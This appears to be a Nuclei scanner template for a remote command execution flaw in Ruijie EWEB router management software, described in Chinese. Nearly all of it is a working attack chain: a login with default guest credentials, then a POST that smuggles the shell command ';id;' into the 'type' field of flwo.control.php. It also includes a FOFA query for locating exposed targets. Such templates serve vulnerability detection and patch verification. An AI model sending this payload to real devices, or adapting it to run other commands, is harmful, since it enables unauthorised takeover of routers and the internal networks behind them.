http:
    - extractors:
        - group: 1
          internal: true
          name: RUIJIEID
          part: header
          regex:
            - RUIJIEID=(.*?);
          type: regex
      raw:
        - |
          POST /ddi/server/login.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded

          username=guest&password=guest?
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /flow_control_pi/flwo.control.php?a=setFlowGroup HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded
          Cookie: {{RUIJIEID}}

          type=;id;
id: ruijieEWEB-control_php-RCE
info:
    author: Superhero
    description: |-
        fofa: title="锐捷网络-EWEB网管系统"
        锐捷EWEB路由器 control.php 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    name: 锐捷EWEB路由器 control.php 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/_cfASRns0zGgGsYGyoYfCQ
    severity: high
    tags:
        - 锐捷eweb
